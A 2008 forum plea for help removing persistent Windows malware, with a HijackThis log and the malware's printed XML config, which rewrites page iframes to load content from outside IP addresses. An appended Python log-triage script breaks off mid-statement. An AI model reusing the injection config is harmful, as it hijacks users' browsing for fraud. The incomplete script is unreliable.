01/27/2008 at 01:31PM PST, ID: 23115046
Help me remove persistent malware

Asked by steve0412 in HijackThis Software, Windows XP Operating System, Anti-Spyware

Hi

I have a problem with a PC in that some malware seems to get half removed by McAfee, which leaves the web pages incompletely loaded. Ok, I have solved that by using Opera BUT, I cannot get rid of this pest. I use McAfee, Spy Hunter, Uniblue Spy Eraser and RogueRemover Pro - nothing will shift this.

It starts with an XML page that regenerates itself when removed (see end of this question for the content). This appears in the HKLM Run section, to run Rundll32.exe (from the system32 directory via prefetching commands). This in turn runs a dll, which is in the system32 directory. This malware even logs on as another user (I have since changed the log on to a guest and with password control to try and prevent this).

Here is the HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:26:24, on 27-01-2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programmer\Fælles filer\McAfee\HackerWatch\HWAPI.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\programmer\fælles filer\mcafee\mna\mcnasvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
c:\PROGRA~1\FÆLLES~1\mcafee\mcproxy\mcproxy.exe
c:\PROGRA~1\FÆLLES~1\mcafee\redirsvc\redirsvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
C:\Programmer\McAfee\MPF\MPFSrv.exe
C:\PROGRA~1\McAfee\MPS\mps.exe
C:\Programmer\McAfee\MSK\MskSrver.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\Programmer\SiteAdvisor\6253\SAService.exe
C:\WINDOWS\system32\svchost.exe
C:\Programmer\McAfee\MSK\MskAgent.exe
C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
C:\WINDOWS\StartupMonitor.exe
C:\Programmer\Enigma Software Group\SpyHunter\SpyHunter3.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programmer\HP\Digital Imaging\bin\hpqtra08.exe
C:\Programmer\McAfee\MPS\mpsevh.exe
C:\Programmer\HP\Digital Imaging\bin\hpqimzone.exe
c:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\WINDOWS\System32\alg.exe
C:\Programmer\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Programmer\HP\Digital Imaging\Product Assistant\bin\hprblog.exe
C:\Documents and Settings\Anne\Skrivebord\Startup.exe
C:\WINDOWS\system32\HPZinw12.exe
C:\WINDOWS\regedit.exe
C:\Documents and Settings\Anne\Skrivebord\HiJackThis.exe
C:\PROGRAM FILES\PROCESS EXPLORER\PROCEXP.EXE
C:\WINDOWS\explorer.exe
C:\Programmer\Opera\Opera.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://dellsearchedit.myway.com/samisc/dellsidebar.jhtml?p=DJ
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.epilepsiforeningen.dk/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hyperlinks
O3 - Toolbar: McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Programmer\SiteAdvisor\6253\SiteAdv.dll
O4 - HKLM\..\Run: [DLA] C:\WINDOWS\System32\DLA\DLACTRLW.EXE
O4 - HKLM\..\Run: [MskAgentexe] C:\Programmer\McAfee\MSK\MskAgent.exe
O4 - HKLM\..\Run: [SiteAdvisor] C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
O4 - HKLM\..\Run: [Run StartupMonitor] StartupMonitor.exe
O4 - HKLM\..\Run: [Spyhunter Security Suite] "C:\Programmer\Enigma Software Group\SpyHunter\SpyHunter3.exe" -minimized
O4 - HKLM\..\Run: [BM870dc8a8] Rundll32.exe "C:\WINDOWS\system32\sslnpilc.dll",s
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKAL TJENESTE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETVÆRKSTJENESTE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Programmer\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Programmer\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: HP Image Zone Hurtig start.lnk = C:\Programmer\HP\Digital Imaging\bin\hpqthb08.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Programmer\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Send til &Bluetooth-enhed... - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: FirstClass® - {02011FE3-C22B-451d-9A25-BF4DBB38B8E7} - C:\WINDOWS\Downloaded Program Files\fcplugin.dll
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmer\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmer\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O16 - DPF: {11818680-FCF6-11D0-9808-0800092A4865} (Adobe Form Control) - http://www.kps.dk/Codebase/FormCtl.cab
O16 - DPF: {1469FF24-47F6-11D2-8805-006008C537E3} (Adobe Mail Control) - http://www.kps.dk/codebase/ffmail.cab
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.mcafee.com/molbin/shared/mcinsctl/4,0,0,101/mcinsctl.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1201280089546
O16 - DPF: {9C196458-4145-46AF-8A77-1506878DFECA} (FirstClass® Control) - ftp://ftp.sektornet.dk/sektornet/skolekom/fcplugin.cab
O16 - DPF: {CDDCFBB3-4D93-11D2-B1A9-00A0C9B742BE} (Adobe Script Object) - http://www.kps.dk/codebase/scriptobject.cab
O16 - DPF: {D8575CE3-3432-4540-88A9-85A1325D3375} (e-Safekey) - https://netbank.danskebank.dk/html/activex/e-Safekey/DB/e-Safekey.cab
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Programmer\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: McAfee E-mail Proxy (Emproxy) - McAfee, Inc. - C:\PROGRA~1\FÆLLES~1\McAfee\EmProxy\emproxy.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programmer\Fælles filer\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Programmer\iPod\bin\iPodService.exe
O23 - Service: McAfee HackerWatch Service - McAfee, Inc. - C:\Programmer\Fælles filer\McAfee\HackerWatch\HWAPI.exe
O23 - Service: McAfee Update Manager (mcmispupdmgr) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcupdmgr.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - c:\programmer\fælles filer\mcafee\mna\mcnasvc.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
O23 - Service: McAfee Protection Manager (mcpromgr) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - c:\PROGRA~1\FÆLLES~1\mcafee\mcproxy\mcproxy.exe
O23 - Service: McAfee Redirector Service (McRedirector) - McAfee, Inc. - c:\PROGRA~1\FÆLLES~1\mcafee\redirsvc\redirsvc.exe
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
O23 - Service: McAfee SystemGuards (McSysmon) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Programmer\McAfee\MPF\MPFSrv.exe
O23 - Service: McAfee Privacy Service (MPS9) - McAfee, Inc. - C:\PROGRA~1\McAfee\MPS\mps.exe
O23 - Service: McAfee SpamKiller Service (MSK80Service) - McAfee Inc. - C:\Programmer\McAfee\MSK\MskSrver.exe
O23 - Service: Intel NCS NetService (NetSvc) - Intel(R) Corporation - C:\Programmer\Intel\PROSetWired\NCS\Sync\NetSvc.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SiteAdvisor-tjeneste (SiteAdvisor Service) - Unknown owner - C:\Programmer\SiteAdvisor\6253\SAService.exe

--
End of file - 8833 bytes


(See the HKLM entry for BM870dc8a8)

BM870dc8a8 is this:

<ROOT><CAMPAIGNLIST><CAMPAIGN name="120x240" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?240['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?240['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x240;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='ae4390b5' name='ae4390b5' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x240&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='240'><a href='http://85.12.43.83/www/delivery/ck.php?n=ad03d9ca' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=35&n=ad03d9ca' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="120x600" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x600;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a57232fb' name='a57232fb' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x600&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='600'><a href='http://85.12.43.83/www/delivery/ck.php?n=a2d7629e' target='_blank'><img 
src='http://85.12.43.83/www/delivery/avw.php?zoneid=36&n=a2d7629e' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="120x90" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x90;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a8c6b7cd' name='a8c6b7cd' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x90&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='90'><a href='http://85.12.43.83/www/delivery/ck.php?n=a0118327' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=37&n=a0118327' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="125x125" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?125['"]?)|(HEIGHT=['"]?125['"]?))+[^>]*?((WIDTH=['"]?125['"]?)|(HEIGHT=['"]?125['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=125x125;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a6ea2661' name='a6ea2661' 
src='http://85.17.166.173/go/?cmp=nm_bm3s_125x125&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='125' height='125'><a href='http://85.12.43.83/www/delivery/ck.php?n=afe4b666' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=38&n=afe4b666' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="160x600" id="20080124"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?160['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?((WIDTH=['"]?160['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=160x600;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a8a9405d' name='a8a9405d' src='http://85.17.166.173/go/?cmp=nm_bm3s_160x600&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='160' height='600'></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="180x150" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?180['"]?)|(HEIGHT=['"]?150['"]?))+[^>]*?((WIDTH=['"]?180['"]?)|(HEIGHT=['"]?150['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=180x150;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" 
weight="100"><![CDATA[<iframe id='aa44b86f' name='aa44b86f' src='http://85.17.166.173/go/?cmp=nm_bm3s_180x150&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='180' height='150'><a href='http://85.12.43.83/www/delivery/ck.php?n=a935a5aa' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=39&n=a935a5aa' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="234x60" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?234['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?((WIDTH=['"]?234['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=234x60;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a80f0628' name='a80f0628' src='http://85.17.166.173/go/?cmp=nm_bm3s_234x60&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='234' height='60'><a href='http://85.12.43.83/www/delivery/ck.php?n=a61ab872' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=40&n=a61ab872' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="240x400" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action 
name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?240['"]?)|(HEIGHT=['"]?400['"]?))+[^>]*?((WIDTH=['"]?240['"]?)|(HEIGHT=['"]?400['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=240x400;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a4da5d34' name='a4da5d34' src='http://85.17.166.173/go/?cmp=nm_bm3s_240x400&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='240' height='400'><a href='http://85.12.43.83/www/delivery/ck.php?n=a424da19' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=41&n=a424da19' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="250x250" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?250['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?((WIDTH=['"]?250['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=250x250;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='ad90e55d' name='ad90e55d' src='http://85.17.166.173/go/?cmp=nm_bm3s_250x250&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='250' height='250'><a href='http://85.12.43.83/www/delivery/ck.php?n=ac032ecf' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=42&n=ac032ecf' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time 
value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="300x100" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?100['"]?))+[^>]*?((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?100['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=300x100;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a1111aad' name='a1111aad' src='http://85.17.166.173/go/?cmp=nm_bm3s_300x100&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='300' height='100'><a href='http://85.12.43.83/www/delivery/ck.php?n=a8b2301d' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=43&n=a8b2301d' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="300x250" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=300x250;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a7b91358' name='a7b91358' src='http://85.17.166.173/go/?cmp=nm_bm3s_300x250&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='300' height='250'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa619a73' target='_blank'><img 
src='http://85.12.43.83/www/delivery/avw.php?zoneid=44&n=aa619a73' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="336x280" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?336['"]?)|(HEIGHT=['"]?280['"]?))+[^>]*?((WIDTH=['"]?336['"]?)|(HEIGHT=['"]?280['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=336x280;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a1e38bd4' name='a1e38bd4' src='http://85.17.166.173/go/?cmp=nm_bm3s_336x280&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='336' height='280'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa2664b8' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=45&n=aa2664b8' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="468x60" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?468['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?((WIDTH=['"]?468['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=468x60;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a24b320b' name='a24b320b' 
src='http://85.17.166.173/go/?cmp=nm_bm3s_468x60&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='468' height='60'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa173903' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=46&n=aa173903' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="720x300" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?720['"]?)|(HEIGHT=['"]?300['"]?))+[^>]*?((WIDTH=['"]?720['"]?)|(HEIGHT=['"]?300['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=720x300;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aaf81f87' name='aaf81f87' src='http://85.17.166.173/go/?cmp=nm_bm3s_720x300&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='720' height='300'><a href='http://85.12.43.83/www/delivery/ck.php?n=afb3d0f9' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=47&n=afb3d0f9' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="728x90" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action 
name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?728['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?((WIDTH=['"]?728['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=728x90;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aff78e03' name='aff78e03' src='http://85.17.166.173/go/?cmp=nm_bm3s_728x90&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='728' height='90'><a href='http://85.12.43.83/www/delivery/ck.php?n=a8ac5ed4' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=48&n=a8ac5ed4' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN></CAMPAIGNLIST><COOKIES><COOKIE>ip=ODcuNjAuOTYuOTA#</COOKIE><COOKIE>country=REs#</COOKIE><COOKIE>network=Ym0#</COOKIE></COOKIES></ROOT>

Has anyone got ANY idea how to remove the mechanism that regenerates this pest? The IP address resolves to Breda in Holland.
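
Added example, not part of the original question or of any reply: a small triage script that parses the O4 registry Run lines of a HijackThis log and flags the persistence pattern the asker describes (a Run value that loads a DLL through rundll32). The sample lines are copied from the log above; the scoring rules and all function names are assumptions made for this illustration.

```python
import ntpath
import re
from dataclasses import dataclass, field

# Constructed sample: O4 lines copied from the HijackThis log in the question.
SAMPLE_LOG = r"""
O4 - HKLM\..\Run: [DLA] C:\WINDOWS\System32\DLA\DLACTRLW.EXE
O4 - HKLM\..\Run: [SiteAdvisor] C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
O4 - HKLM\..\Run: [Run StartupMonitor] StartupMonitor.exe
O4 - HKLM\..\Run: [Spyhunter Security Suite] "C:\Programmer\Enigma Software Group\SpyHunter\SpyHunter3.exe" -minimized
O4 - HKLM\..\Run: [BM870dc8a8] Rundll32.exe "C:\WINDOWS\system32\sslnpilc.dll",s
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKAL TJENESTE')
O4 - Global Startup: Microsoft Office.lnk = C:\Programmer\Microsoft Office\Office10\OSA.EXE
"""

# "O4 - <hive>[\<SID>]\..\<Run key>: [<value name>] <command>"
RUN_RE = re.compile(
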